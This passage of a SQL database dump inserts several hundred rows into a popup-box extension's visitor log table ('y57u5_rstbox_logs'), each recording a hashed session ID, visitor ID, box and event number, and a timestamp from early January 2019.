(45789, '499ca73b2b9993687d6aa65073c1439c', 'a4a07b7594d06ca8', 0, 2, 1, '2019-01-02 17:53:51'),
(45790, '342799cb7f074ef02f25d3c776156e25', '13c0db445f103bdc', 0, 2, 1, '2019-01-02 17:56:14'),
(45791, '8fc1e813742942b41cb0780fefda741b', '2034f09284a4c7ca', 0, 2, 1, '2019-01-02 17:56:21'),
(45792, 'd318988222eee6f81d799d1cf91357d7', 'ec138ac7c35c53a7', 0, 2, 1, '2019-01-02 17:59:35'),
(45793, '18020257c7c3ef50441d93f385aa3aa5', '86f971d8c824d84a', 0, 2, 1, '2019-01-02 18:04:37'),
(45794, 'cf5aebdd4fe837f4fc7635e23c21d50b', '2b8914e50837b1d4', 0, 2, 1, '2019-01-02 18:06:04'),
(45795, 'cf5aebdd4fe837f4fc7635e23c21d50b', '2b8914e50837b1d4', 0, 2, 1, '2019-01-02 18:06:38'),
(45796, '2362d9059e7bbba0402304fa6db1da83', '764af5576358f902', 0, 2, 1, '2019-01-02 18:06:50'),
(45797, '499ca73b2b9993687d6aa65073c1439c', 'a4a07b7594d06ca8', 0, 2, 1, '2019-01-02 18:07:27'),
(45798, '499ca73b2b9993687d6aa65073c1439c', 'a4a07b7594d06ca8', 0, 2, 1, '2019-01-02 18:07:46'),
(45799, 'ff6d7a56bfba2b3b697b2c676a4bb0e3', '169323dd7e9aa10c', 0, 2, 1, '2019-01-02 18:08:49'),
(45800, 'e28635f5e8003fac87139400ff6ed80a', 'f19010d8a5f137d0', 0, 2, 1, '2019-01-02 18:10:21'),
(45801, 'ff6d7a56bfba2b3b697b2c676a4bb0e3', '169323dd7e9aa10c', 0, 2, 1, '2019-01-02 18:10:24'),
(45802, '18020257c7c3ef50441d93f385aa3aa5', '86f971d8c824d84a', 0, 2, 1, '2019-01-02 18:12:41'),
(45803, 'b2cbd8207d64bae00396a51377e20380', '9b439e4e6dd53e8a', 0, 2, 1, '2019-01-02 18:12:44'),
(45804, 'a27cd32f3365d6634dae0a8c0e2a024d', '601ff999e03a8543', 0, 2, 1, '2019-01-02 18:12:55'),
(45805, 'a666dee2c3bbe303c4fbd569715019c0', '9fce78250ec13426', 0, 2, 1, '2019-01-02 18:13:50'),
(45806, 'be1583050b153877774e74500c3f7801', '70df5ba7bd3f1512', 0, 2, 1, '2019-01-02 18:15:25'),
(45807, 'be1583050b153877774e74500c3f7801', '70df5ba7bd3f1512', 0, 2, 1, '2019-01-02 18:15:33'),
(45808, '81c983b2efbc8c79382ae830b7890026', 'c423a976f7958be7', 0, 2, 1, '2019-01-02 18:20:08'),
(45809, 'b2cbd8207d64bae00396a51377e20380', '9b439e4e6dd53e8a', 0, 2, 1, '2019-01-02 18:20:41'),
(45810, 'a27cd32f3365d6634dae0a8c0e2a024d', '601ff999e03a8543', 0, 2, 1, '2019-01-02 18:21:03'),
(45811, '57b9682a430ee351e588b6d360f6b4e2', '4b737a5213fcd053', 0, 2, 1, '2019-01-02 18:22:06'),
(45812, '44192d66477749d031cc5a714fabd2e8', '461b6ce2b519cdc8', 0, 2, 1, '2019-01-02 18:25:45'),
(45813, '44192d66477749d031cc5a714fabd2e8', '461b6ce2b519cdc8', 0, 2, 1, '2019-01-02 18:26:08'),
(45814, '18020257c7c3ef50441d93f385aa3aa5', '86f971d8c824d84a', 0, 2, 1, '2019-01-02 18:30:16'),
(45815, '4f8851409065efc73df1a935ba825dfc', 'e7b58577fad67f20', 0, 2, 1, '2019-01-02 18:33:33'),
(45816, '534ba841f48bdda5c4727007c24e362c', '9fa71c818742c95f', 0, 2, 1, '2019-01-02 18:36:28'),
(45817, '47483e343edd7b13aeac985aa4945d68', '6092d6c1cb041b23', 0, 2, 1, '2019-01-02 18:39:47'),
(45818, '18020257c7c3ef50441d93f385aa3aa5', '86f971d8c824d84a', 0, 2, 1, '2019-01-02 18:42:13'),
(45819, 'e8d2456a9115187ba3add1115489d323', '6092d6c1cb041b23', 0, 2, 1, '2019-01-02 18:46:33'),
(45820, '40a9bf2e62a3dae3c16ad3834372db08', '113a26d6adf3f967', 0, 2, 1, '2019-01-02 18:46:35'),
(45821, 'd318988222eee6f81d799d1cf91357d7', 'ec138ac7c35c53a7', 0, 2, 1, '2019-01-02 18:47:16'),
(45822, '3f448f46613f2b1e11d88cc15095dedb', '29608a328df169fa', 0, 2, 1, '2019-01-02 18:47:24'),
(45823, 'a3ea145bf2e61cf129a95709dff84112', '6420d9840f07d5c4', 0, 2, 1, '2019-01-02 18:49:13'),
(45824, 'a349d447863bd1d64bcd96fadd1bd28d', '96d00522dfb626b2', 0, 2, 1, '2019-01-02 18:50:31'),
(45825, '18020257c7c3ef50441d93f385aa3aa5', '86f971d8c824d84a', 0, 2, 1, '2019-01-02 18:51:52'),
(45826, 'e5890e37037de8f3510ba91021167abd', '3233431a244017cd', 0, 2, 1, '2019-01-02 18:52:07'),
(45827, 'e5890e37037de8f3510ba91021167abd', '3233431a244017cd', 0, 2, 1, '2019-01-02 18:52:08'),
(45828, '40a9bf2e62a3dae3c16ad3834372db08', '113a26d6adf3f967', 0, 2, 1, '2019-01-02 18:52:34'),
(45829, '592dbf293c5c19aebf2d309cef2dde44', '461b6ce2b519cdc8', 0, 2, 1, '2019-01-02 18:53:10'),
(45830, '592dbf293c5c19aebf2d309cef2dde44', '461b6ce2b519cdc8', 0, 2, 1, '2019-01-02 18:54:29'),
(45831, '592dbf293c5c19aebf2d309cef2dde44', '461b6ce2b519cdc8', 0, 2, 1, '2019-01-02 18:54:38'),
(45832, '57b9682a430ee351e588b6d360f6b4e2', '4b737a5213fcd053', 0, 2, 1, '2019-01-02 18:59:33'),
(45833, '6bd083920b2964d97b734cf6c358c83b', '1c797342ae24ca5a', 0, 2, 1, '2019-01-02 19:03:23'),
(45834, '3f448f46613f2b1e11d88cc15095dedb', '29608a328df169fa', 0, 2, 1, '2019-01-02 19:08:41'),
(45835, '81c983b2efbc8c79382ae830b7890026', 'c423a976f7958be7', 0, 2, 1, '2019-01-02 19:11:48'),
(45836, '41f1cd21ae07364087aad2898c2df626', '629ac4ab56bd2f1d', 0, 2, 1, '2019-01-02 19:12:01'),
(45837, '1d97f244efe0e3f85a7ed3cbf537415e', 'a5467ba381fa9fff', 0, 2, 1, '2019-01-02 19:18:49'),
(45838, '3f448f46613f2b1e11d88cc15095dedb', '29608a328df169fa', 0, 2, 1, '2019-01-02 19:18:59'),
(45839, 'd503f130a8124c3b04b3cb7037865dcd', '89513236b7d7bea5', 0, 2, 1, '2019-01-02 19:24:23'),
(45840, 'd503f130a8124c3b04b3cb7037865dcd', '89513236b7d7bea5', 0, 2, 1, '2019-01-02 19:24:37'),
(45841, 'd503f130a8124c3b04b3cb7037865dcd', '89513236b7d7bea5', 0, 2, 1, '2019-01-02 19:24:38'),
(45842, 'd503f130a8124c3b04b3cb7037865dcd', '89513236b7d7bea5', 0, 2, 1, '2019-01-02 19:25:23'),
(45843, 'd503f130a8124c3b04b3cb7037865dcd', '89513236b7d7bea5', 0, 2, 1, '2019-01-02 19:25:45'),
(45844, 'd503f130a8124c3b04b3cb7037865dcd', '89513236b7d7bea5', 0, 2, 1, '2019-01-02 19:26:27'),
(45845, 'd503f130a8124c3b04b3cb7037865dcd', '89513236b7d7bea5', 0, 2, 1, '2019-01-02 19:26:39'),
(45846, '7129f1e30d0d62422a454f04321fff53', '0530018377078939', 0, 2, 1, '2019-01-02 19:27:27'),
(45847, 'efacbd252a5df709e85a68d9b46c2a05', 'ebee759469aca1fa', 0, 2, 1, '2019-01-02 19:28:45'),
(45848, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-02 19:28:46'),
(45849, '1d97f244efe0e3f85a7ed3cbf537415e', 'a5467ba381fa9fff', 0, 2, 1, '2019-01-02 19:28:53'),
(45850, '1d97f244efe0e3f85a7ed3cbf537415e', 'a5467ba381fa9fff', 0, 2, 1, '2019-01-02 19:29:13'),
(45851, 'b58a798a291e93b5f1f6cac018f9d018', 'e811532d4fba8e9c', 0, 2, 1, '2019-01-02 19:29:41'),
(45852, 'c2a036b5001aa7d23f22e4eee3d8353f', '1de090ec808c88cc', 0, 2, 1, '2019-01-02 19:31:54'),
(45853, 'a27cd32f3365d6634dae0a8c0e2a024d', '601ff999e03a8543', 0, 2, 1, '2019-01-02 19:35:29'),
(45854, '3f448f46613f2b1e11d88cc15095dedb', '29608a328df169fa', 0, 2, 1, '2019-01-02 19:36:48'),
(45855, 'a27cd32f3365d6634dae0a8c0e2a024d', '601ff999e03a8543', 0, 2, 1, '2019-01-02 19:38:28'),
(45856, 'eef04d2c6c36f97310c20247c1570b3b', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-02 19:40:15'),
(45857, 'eef04d2c6c36f97310c20247c1570b3b', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-02 19:40:23'),
(45858, 'e5890e37037de8f3510ba91021167abd', '3233431a244017cd', 0, 2, 1, '2019-01-02 19:43:26'),
(45859, '7fe1c8a02b80fa36f115680f461688d2', 'ec138ac7c35c53a7', 0, 2, 1, '2019-01-02 20:02:36'),
(45860, 'b58a798a291e93b5f1f6cac018f9d018', 'e811532d4fba8e9c', 0, 2, 1, '2019-01-02 20:08:27'),
(45861, '3cb35bfed2738b0d10f77eefe1ae2068', '31c9231ce41a9a37', 0, 2, 1, '2019-01-02 20:13:55'),
(45862, '48aa09109a0c794887929ac258e66ff5', '77ec5b7d2d8ef362', 0, 2, 1, '2019-01-02 21:00:03'),
(45863, '5ba2bb8028a3fb97725f4a646d968336', 'fc794f0a80972404', 0, 2, 1, '2019-01-02 21:20:25'),
(45864, 'a666dee2c3bbe303c4fbd569715019c0', '9fce78250ec13426', 0, 2, 1, '2019-01-02 21:23:44'),
(45865, 'a666dee2c3bbe303c4fbd569715019c0', '9fce78250ec13426', 0, 2, 1, '2019-01-02 21:23:49'),
(45866, 'b6aa868890ac27a4037b0b476d8d19a2', 'da070c6b1c3611ae', 0, 2, 1, '2019-01-02 21:40:08'),
(45867, '3b833382ce5b25633ef44925b3e14c2f', '0cde8b0adb855f69', 0, 2, 1, '2019-01-02 21:49:21'),
(45868, 'b6aa868890ac27a4037b0b476d8d19a2', 'da070c6b1c3611ae', 0, 2, 1, '2019-01-02 21:54:17'),
(45869, 'b6aa868890ac27a4037b0b476d8d19a2', 'da070c6b1c3611ae', 0, 2, 1, '2019-01-02 21:56:04'),
(45870, 'b6aa868890ac27a4037b0b476d8d19a2', 'da070c6b1c3611ae', 0, 2, 1, '2019-01-02 21:57:25'),
(45871, 'b6aa868890ac27a4037b0b476d8d19a2', 'da070c6b1c3611ae', 0, 2, 1, '2019-01-02 21:58:08'),
(45872, 'b6aa868890ac27a4037b0b476d8d19a2', 'da070c6b1c3611ae', 0, 2, 1, '2019-01-02 21:58:24'),
(45873, 'b6aa868890ac27a4037b0b476d8d19a2', 'da070c6b1c3611ae', 0, 2, 1, '2019-01-02 21:58:35'),
(45874, 'b6aa868890ac27a4037b0b476d8d19a2', 'da070c6b1c3611ae', 0, 2, 1, '2019-01-02 21:58:49'),
(45875, 'b6aa868890ac27a4037b0b476d8d19a2', 'da070c6b1c3611ae', 0, 2, 1, '2019-01-02 21:59:19'),
(45876, 'b6aa868890ac27a4037b0b476d8d19a2', 'da070c6b1c3611ae', 0, 2, 1, '2019-01-02 21:59:56'),
(45877, '77cf2b5a5308b82a9052ef8be78cfd3e', 'c1fca6d49383a74a', 0, 2, 1, '2019-01-02 22:04:30'),
(45878, 'c6cb53736ccdb1a9cbbcb320ed7638b4', 'f6819ecc740ff846', 0, 2, 1, '2019-01-02 22:21:15'),
(45879, 'c6cb53736ccdb1a9cbbcb320ed7638b4', 'f6819ecc740ff846', 0, 2, 1, '2019-01-02 22:21:45'),
(45880, 'c6cb53736ccdb1a9cbbcb320ed7638b4', 'f6819ecc740ff846', 0, 2, 1, '2019-01-02 22:22:13'),
(45881, 'c6cb53736ccdb1a9cbbcb320ed7638b4', 'f6819ecc740ff846', 0, 2, 1, '2019-01-02 22:22:27'),
(45882, 'c6cb53736ccdb1a9cbbcb320ed7638b4', 'f6819ecc740ff846', 0, 2, 1, '2019-01-02 22:22:49'),
(45883, 'c6cb53736ccdb1a9cbbcb320ed7638b4', 'f6819ecc740ff846', 0, 2, 1, '2019-01-02 22:23:02'),
(45884, 'b1ad27af255e7cbc2eaf780937d68c60', '8e815b2f4d02fe94', 0, 2, 1, '2019-01-02 23:12:04'),
(45885, '0936b82446282191456b84cf123b5e73', '69f36c4a6d1a49e7', 0, 2, 1, '2019-01-02 23:38:30'),
(45886, '43acb5d198f6d91f623816a5365a2eb9', '19ac418837a1bfb6', 0, 2, 1, '2019-01-02 23:55:59'),
(45887, '48d55c47f4a5012df82a02a2c048f7a8', '85c6bb276bd9c062', 0, 2, 1, '2019-01-03 01:26:30'),
(45888, '351ed18fd925ef32155dddde015de2e5', '041313a47f616120', 0, 2, 1, '2019-01-03 01:27:03'),
(45889, 'b9cc6723a23251126b53c87ab2fade3b', '7234ecb5fc6636e5', 0, 2, 1, '2019-01-03 01:27:05'),
(45890, '351ed18fd925ef32155dddde015de2e5', '041313a47f616120', 0, 2, 1, '2019-01-03 01:27:23'),
(45891, '3ff557552f096b64454e523a82723ab7', '7a2e7ba0eb3cbe30', 0, 2, 1, '2019-01-03 01:55:25'),
(45892, '6bd083920b2964d97b734cf6c358c83b', '1c797342ae24ca5a', 0, 2, 1, '2019-01-03 02:01:20'),
(45893, 'a666dee2c3bbe303c4fbd569715019c0', '9fce78250ec13426', 0, 2, 1, '2019-01-03 04:22:47'),
(45894, '516c47ece39daf4bc8520c018841afe4', '2b71b23414178096', 0, 2, 1, '2019-01-03 04:27:16'),
(45895, 'df966ea78a5f37eb85b8a331975a63c9', 'ed208305744211bb', 0, 2, 1, '2019-01-03 04:29:09'),
(45896, 'a666dee2c3bbe303c4fbd569715019c0', '9fce78250ec13426', 0, 2, 1, '2019-01-03 04:46:08'),
(45897, 'a666dee2c3bbe303c4fbd569715019c0', '9fce78250ec13426', 0, 2, 1, '2019-01-03 04:46:14'),
(45898, 'a666dee2c3bbe303c4fbd569715019c0', '9fce78250ec13426', 0, 2, 1, '2019-01-03 04:49:18'),
(45899, 'a666dee2c3bbe303c4fbd569715019c0', '9fce78250ec13426', 0, 2, 1, '2019-01-03 04:53:46'),
(45900, 'c2a036b5001aa7d23f22e4eee3d8353f', '1de090ec808c88cc', 0, 2, 1, '2019-01-03 05:34:36'),
(45901, 'c2a036b5001aa7d23f22e4eee3d8353f', '1de090ec808c88cc', 0, 2, 1, '2019-01-03 05:35:25'),
(45902, '85117fdda42f78dbec50cce131a3cca4', 'b305c89b7effe3a1', 0, 2, 1, '2019-01-03 05:59:37');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(45903, '7503e7646c8e1db92a79bad679909e27', 'ed0be84401709a4b', 0, 2, 1, '2019-01-03 06:50:32'),
(45904, '27d346d5fb65ddc8afff9393519afafe', '711f7354465f4bb3', 0, 2, 1, '2019-01-03 07:12:45'),
(45905, '913c7c446f47fd079357643f2419171c', '2efd5300df4446a2', 0, 2, 1, '2019-01-03 07:22:24'),
(45906, '913c7c446f47fd079357643f2419171c', '2efd5300df4446a2', 0, 2, 1, '2019-01-03 07:23:13'),
(45907, 'd6146b99b0fe4c76943493d957cd3c2a', '0c844fefc01db064', 0, 2, 1, '2019-01-03 07:35:03'),
(45908, '5f05cc88b06398bc3dbfed37018d732d', '1267050fbb458315', 0, 2, 1, '2019-01-03 07:42:58'),
(45909, '78d8072ce3d20b06cd68c5465db90aa2', '7c5bcf99f2070582', 0, 2, 1, '2019-01-03 08:08:28'),
(45910, '78d8072ce3d20b06cd68c5465db90aa2', '7c5bcf99f2070582', 0, 2, 1, '2019-01-03 08:08:34'),
(45911, 'e8ccbec4d9b05b96b63634bf2ad4dd6c', '711f7354465f4bb3', 0, 2, 1, '2019-01-03 08:56:59'),
(45912, '023e69ce507e81006def861b891ff562', 'd18adcc2ffe7c6d9', 0, 2, 1, '2019-01-03 09:01:50'),
(45913, 'e8ccbec4d9b05b96b63634bf2ad4dd6c', '711f7354465f4bb3', 0, 2, 1, '2019-01-03 09:01:56'),
(45914, 'e8ccbec4d9b05b96b63634bf2ad4dd6c', '711f7354465f4bb3', 0, 2, 1, '2019-01-03 09:03:08'),
(45915, 'e8ccbec4d9b05b96b63634bf2ad4dd6c', '711f7354465f4bb3', 0, 2, 1, '2019-01-03 09:03:24'),
(45916, 'e8ccbec4d9b05b96b63634bf2ad4dd6c', '711f7354465f4bb3', 0, 2, 1, '2019-01-03 09:03:43'),
(45917, '789ec2521ac70a75cfd6ce038c580034', 'd809246448516900', 0, 2, 1, '2019-01-03 09:18:27'),
(45918, 'f80239e332097bc37e09200a62c4571e', '4d26656cf495bba3', 0, 2, 1, '2019-01-03 10:09:23'),
(45919, '7f5abf9c694508336eff8a35f191efbb', '8d560ad7723df7f0', 0, 2, 1, '2019-01-03 10:20:06'),
(45920, '7f5abf9c694508336eff8a35f191efbb', '8d560ad7723df7f0', 0, 2, 1, '2019-01-03 10:20:42'),
(45921, 'afebbeaeb1ece1a4fb0e97af86fd3f84', 'c446511735e28fc2', 0, 2, 1, '2019-01-03 10:26:14'),
(45922, 'afebbeaeb1ece1a4fb0e97af86fd3f84', 'c446511735e28fc2', 0, 2, 1, '2019-01-03 10:28:41'),
(45923, 'aa651a41a36585abc359695abcae0bd7', '433577cdf4c8f98a', 0, 2, 1, '2019-01-03 10:35:32'),
(45924, 'aa651a41a36585abc359695abcae0bd7', '433577cdf4c8f98a', 0, 2, 1, '2019-01-03 10:36:34'),
(45925, 'aa651a41a36585abc359695abcae0bd7', '433577cdf4c8f98a', 0, 2, 1, '2019-01-03 10:36:53'),
(45926, 'aa651a41a36585abc359695abcae0bd7', '433577cdf4c8f98a', 0, 2, 1, '2019-01-03 10:41:15'),
(45927, 'aa651a41a36585abc359695abcae0bd7', '433577cdf4c8f98a', 0, 2, 1, '2019-01-03 10:42:54'),
(45928, 'e279e3c247eaff6476b9967473c437a2', '6a25cb6329f610b2', 0, 2, 1, '2019-01-03 11:33:20'),
(45929, 'd53733e6312fe55906acceaa7f7e472b', '6d8c93203d1bd217', 0, 2, 1, '2019-01-03 11:36:33'),
(45930, '8fce2e47aa2509c339ce4e4729033027', 'cb52d6166f708a67', 0, 2, 1, '2019-01-03 11:38:08'),
(45931, '43332b7758747fe216319003a2cc1d5e', 'acc55ac31d26c56c', 0, 2, 1, '2019-01-03 11:50:04'),
(45932, '43332b7758747fe216319003a2cc1d5e', 'acc55ac31d26c56c', 0, 2, 1, '2019-01-03 11:50:10'),
(45933, 'e279e3c247eaff6476b9967473c437a2', '6a25cb6329f610b2', 0, 2, 1, '2019-01-03 11:59:43'),
(45934, 'dd23a897bac7644e204ff9c7f08c2d0c', '22cf89d1879dd8bf', 0, 2, 1, '2019-01-03 12:19:07'),
(45935, '0666b77de9655ea4c062aaec4fa51f06', '4873a26a6c9440e5', 0, 2, 1, '2019-01-03 12:38:18'),
(45936, '56c2ae80d0f00507ac40c382ffeb56c8', '02829647d6d6d42d', 0, 2, 1, '2019-01-03 12:59:30'),
(45937, '554239776cead6105714f2d57da743ca', '9d68d8140c56b861', 0, 2, 1, '2019-01-03 13:27:51'),
(45938, 'e6697af46293310b4c9fc01b50cbe899', '8d93cd769db170c2', 0, 2, 1, '2019-01-03 13:27:53'),
(45939, '818cf9a6919f2081d993317790c1fb0b', '960d12b6c14f65ca', 0, 2, 1, '2019-01-03 13:37:39'),
(45940, 'a1195080b7bfcaf686c4bf4ac41d5bc5', 'a3bcec11aafc3b90', 0, 2, 1, '2019-01-03 14:16:33'),
(45941, '18a044d373ec02a944648c9503e4dbb7', '76adbb27d088daff', 0, 2, 1, '2019-01-03 14:17:10'),
(45942, 'a1195080b7bfcaf686c4bf4ac41d5bc5', 'a3bcec11aafc3b90', 0, 2, 1, '2019-01-03 14:17:14'),
(45943, 'a1195080b7bfcaf686c4bf4ac41d5bc5', 'a3bcec11aafc3b90', 0, 2, 1, '2019-01-03 14:21:13'),
(45944, 'a1195080b7bfcaf686c4bf4ac41d5bc5', 'a3bcec11aafc3b90', 0, 2, 1, '2019-01-03 14:24:47'),
(45945, 'a1195080b7bfcaf686c4bf4ac41d5bc5', 'a3bcec11aafc3b90', 0, 2, 1, '2019-01-03 14:30:08'),
(45946, 'a1195080b7bfcaf686c4bf4ac41d5bc5', 'a3bcec11aafc3b90', 0, 2, 1, '2019-01-03 14:30:58'),
(45947, 'a1195080b7bfcaf686c4bf4ac41d5bc5', 'a3bcec11aafc3b90', 0, 2, 1, '2019-01-03 14:33:12'),
(45948, 'a1195080b7bfcaf686c4bf4ac41d5bc5', 'a3bcec11aafc3b90', 0, 2, 1, '2019-01-03 14:33:47'),
(45949, 'a1195080b7bfcaf686c4bf4ac41d5bc5', 'a3bcec11aafc3b90', 0, 2, 1, '2019-01-03 14:36:52'),
(45950, 'a1195080b7bfcaf686c4bf4ac41d5bc5', 'a3bcec11aafc3b90', 0, 2, 1, '2019-01-03 14:37:47'),
(45951, 'a1195080b7bfcaf686c4bf4ac41d5bc5', 'a3bcec11aafc3b90', 0, 2, 1, '2019-01-03 14:38:50'),
(45952, 'a1195080b7bfcaf686c4bf4ac41d5bc5', 'a3bcec11aafc3b90', 0, 2, 1, '2019-01-03 14:40:14'),
(45953, 'a1195080b7bfcaf686c4bf4ac41d5bc5', 'a3bcec11aafc3b90', 0, 2, 1, '2019-01-03 14:43:25'),
(45954, 'a1195080b7bfcaf686c4bf4ac41d5bc5', 'a3bcec11aafc3b90', 0, 2, 1, '2019-01-03 14:43:55'),
(45955, 'a1195080b7bfcaf686c4bf4ac41d5bc5', 'a3bcec11aafc3b90', 0, 2, 1, '2019-01-03 14:47:49'),
(45956, 'a1195080b7bfcaf686c4bf4ac41d5bc5', 'a3bcec11aafc3b90', 0, 2, 1, '2019-01-03 14:48:41'),
(45957, '90c24235f66017c4a5f934fa1dfe06ea', 'ef8237817dafcc41', 0, 2, 1, '2019-01-03 15:15:18'),
(45958, 'c8131784b7b4bc8b3dadaeb80b67cf4c', 'd10119a9abb74bbc', 0, 2, 1, '2019-01-03 15:18:27'),
(45959, 'c8af9a857d548b38237ee05585a2912e', '3569f4fc8b4de754', 0, 2, 1, '2019-01-03 15:24:19'),
(45960, '6a7ea955599caf697fa1af3b78c851aa', 'da7a6d9750e46082', 0, 2, 1, '2019-01-03 15:29:07'),
(45961, '6a7ea955599caf697fa1af3b78c851aa', 'da7a6d9750e46082', 0, 2, 1, '2019-01-03 15:29:48'),
(45962, '6a7ea955599caf697fa1af3b78c851aa', 'da7a6d9750e46082', 0, 2, 1, '2019-01-03 15:30:59'),
(45963, '6a7ea955599caf697fa1af3b78c851aa', 'da7a6d9750e46082', 0, 2, 1, '2019-01-03 15:32:13'),
(45964, '6a7ea955599caf697fa1af3b78c851aa', 'da7a6d9750e46082', 0, 2, 1, '2019-01-03 15:32:28'),
(45965, 'f92a962077754dcf8c554b63d2369349', '0c7e692573610028', 0, 2, 1, '2019-01-03 15:35:01'),
(45966, 'f92a962077754dcf8c554b63d2369349', '0c7e692573610028', 0, 2, 1, '2019-01-03 15:35:45'),
(45967, '2e0bdc8a6abf5a8f0789b2dd227e8cdc', 'f38583cfb1bdab53', 0, 2, 1, '2019-01-03 15:52:31'),
(45968, '2e0bdc8a6abf5a8f0789b2dd227e8cdc', 'f38583cfb1bdab53', 0, 2, 1, '2019-01-03 15:52:44'),
(45969, '2e0bdc8a6abf5a8f0789b2dd227e8cdc', 'f38583cfb1bdab53', 0, 2, 1, '2019-01-03 15:54:56'),
(45970, '2e0bdc8a6abf5a8f0789b2dd227e8cdc', 'f38583cfb1bdab53', 0, 2, 1, '2019-01-03 15:57:39'),
(45971, '2e0bdc8a6abf5a8f0789b2dd227e8cdc', 'f38583cfb1bdab53', 0, 2, 1, '2019-01-03 15:57:44'),
(45972, '2e0bdc8a6abf5a8f0789b2dd227e8cdc', 'f38583cfb1bdab53', 0, 2, 1, '2019-01-03 15:57:52'),
(45973, '2e0bdc8a6abf5a8f0789b2dd227e8cdc', 'f38583cfb1bdab53', 0, 2, 1, '2019-01-03 15:59:50'),
(45974, '2e0bdc8a6abf5a8f0789b2dd227e8cdc', 'f38583cfb1bdab53', 0, 2, 1, '2019-01-03 16:00:16'),
(45975, '2e0bdc8a6abf5a8f0789b2dd227e8cdc', 'f38583cfb1bdab53', 0, 2, 1, '2019-01-03 16:00:22'),
(45976, '9a42b73faac30aa329a25a309864dc1b', 'a3bcec11aafc3b90', 0, 2, 1, '2019-01-03 16:35:34'),
(45977, 'f86545687fef904314b7cd4f610d1691', '3ba3484de462963c', 0, 2, 1, '2019-01-03 16:44:37'),
(45978, '383951f75da3f7f64d04a212b7cb1afd', '136b55fc3215bee0', 0, 2, 1, '2019-01-03 16:55:19'),
(45979, '595f0fe0e8e680b59bf1724ada31f626', 'afdb985b4766b5e9', 0, 2, 1, '2019-01-03 17:22:27'),
(45980, '595f0fe0e8e680b59bf1724ada31f626', 'afdb985b4766b5e9', 0, 2, 1, '2019-01-03 17:22:57'),
(45981, '595f0fe0e8e680b59bf1724ada31f626', 'afdb985b4766b5e9', 0, 2, 1, '2019-01-03 17:25:54'),
(45982, 'a806aacf1f9cc1c26353990949eed457', '8c559e2b9fbdc14d', 0, 2, 1, '2019-01-03 17:33:13'),
(45983, '4e21bb5d57affcef3acb469a48dc3a67', 'a5d19241a161fadb', 0, 2, 1, '2019-01-03 17:53:09'),
(45984, 'd4abb7bf14b018ac0ec4450663fda395', 'b2efcfe3cfdcd740', 0, 2, 1, '2019-01-03 17:53:27'),
(45985, '74488d8b76a36f34b7800d34ef33b56b', 'b5dea531bb51b38d', 0, 2, 1, '2019-01-03 18:01:40'),
(45986, 'e85b590d0bdf429f6adc0980d792434e', '6a01a7643219afab', 0, 2, 1, '2019-01-03 18:21:29'),
(45987, 'b8ae894366a67346e6607c0fc7153171', '1a02e25b962dc435', 0, 2, 1, '2019-01-03 18:34:45'),
(45988, 'b8ae894366a67346e6607c0fc7153171', '1a02e25b962dc435', 0, 2, 1, '2019-01-03 18:35:07'),
(45989, 'b8ae894366a67346e6607c0fc7153171', '1a02e25b962dc435', 0, 2, 1, '2019-01-03 18:35:34'),
(45990, '9f9d375aeafc595e4e42f0ebb422a875', '9965c34a120053c5', 0, 2, 1, '2019-01-03 18:53:11'),
(45991, '05861e98b58edc00a0d4c02451fef518', '1f3cdbcd217bc580', 0, 2, 1, '2019-01-03 19:34:38'),
(45992, 'fc7bf7bd6763311ba246a38311b8418f', '408b067979ddbb7c', 0, 2, 1, '2019-01-03 19:54:51'),
(45993, '3553ab12570466a28750aa8099c622d7', 'ac722b37044315b8', 0, 2, 1, '2019-01-03 20:49:10'),
(45994, 'c0202783b833a35155be811d1b3febb5', '53344e7f5bd966e0', 0, 2, 1, '2019-01-03 20:57:41'),
(45995, '6460f30e0f8cf745b411e948e9313e7e', '8c679deebaaffd45', 0, 2, 1, '2019-01-03 21:41:09'),
(45996, 'f5b49fee0b8d81c7c5d9371f3da95e99', '893b8e24ecbf5d50', 0, 2, 1, '2019-01-03 21:55:02'),
(45997, 'f5b49fee0b8d81c7c5d9371f3da95e99', '893b8e24ecbf5d50', 0, 2, 1, '2019-01-03 22:07:12'),
(45998, '8c8a571ca9c87a56866ae280d791980d', '300a4234a706f1fd', 0, 2, 1, '2019-01-03 22:37:18'),
(45999, 'd701c773afb1fe6110c47b45ad0c4dba', 'fb05c7d12da91ded', 0, 2, 1, '2019-01-03 23:30:33'),
(46000, 'd701c773afb1fe6110c47b45ad0c4dba', 'fb05c7d12da91ded', 0, 2, 1, '2019-01-03 23:31:02'),
(46001, 'd701c773afb1fe6110c47b45ad0c4dba', 'fb05c7d12da91ded', 0, 2, 1, '2019-01-03 23:32:54'),
(46002, '984a4254aea7fbacf5172e3a1d3f71cb', '0a510343472375c1', 0, 2, 1, '2019-01-04 00:52:36'),
(46003, '2b9ea61f4a2bff5f308108c0e2613e9a', 'ac694e9e69516c6d', 0, 2, 1, '2019-01-04 01:15:55'),
(46004, 'c696ec29070172484f653d17eda169d1', 'd106e0921031a438', 0, 2, 1, '2019-01-04 02:00:10'),
(46005, '37b562fed4c16070e9a8f558540a3f40', 'e068e82432f651cc', 0, 2, 1, '2019-01-04 02:01:19'),
(46006, '35105c0cb4bfea251d5c5cc950c759a7', '0530018377078939', 0, 2, 1, '2019-01-04 02:14:36'),
(46007, 'a127640927a8e841a9e0dd64c86fce36', '71aaa3a339f495bb', 0, 2, 1, '2019-01-04 02:29:35'),
(46008, 'c2c931737f06ef1e17a597a9b05afdfa', 'd5beab7011e45301', 0, 2, 1, '2019-01-04 03:04:04'),
(46009, '96ce6bfe9cdd6222ef7ed08b8291467c', '11cf736d265fcfe9', 0, 2, 1, '2019-01-04 03:27:56'),
(46010, 'da766e2a7b51fef0bcb82170e300edf8', '120b773821b5a659', 0, 2, 1, '2019-01-04 03:49:57'),
(46011, 'da766e2a7b51fef0bcb82170e300edf8', '120b773821b5a659', 0, 2, 1, '2019-01-04 03:52:46'),
(46012, 'e4e67ffaa15182b691cf6cc22cbfa310', 'ed208305744211bb', 0, 2, 1, '2019-01-04 04:18:54'),
(46013, 'e4e67ffaa15182b691cf6cc22cbfa310', 'ed208305744211bb', 0, 2, 1, '2019-01-04 04:19:42'),
(46014, 'e4b16a1cb34be92942b37649f1487437', '52eee1d9e4547b1b', 0, 2, 1, '2019-01-04 04:20:57'),
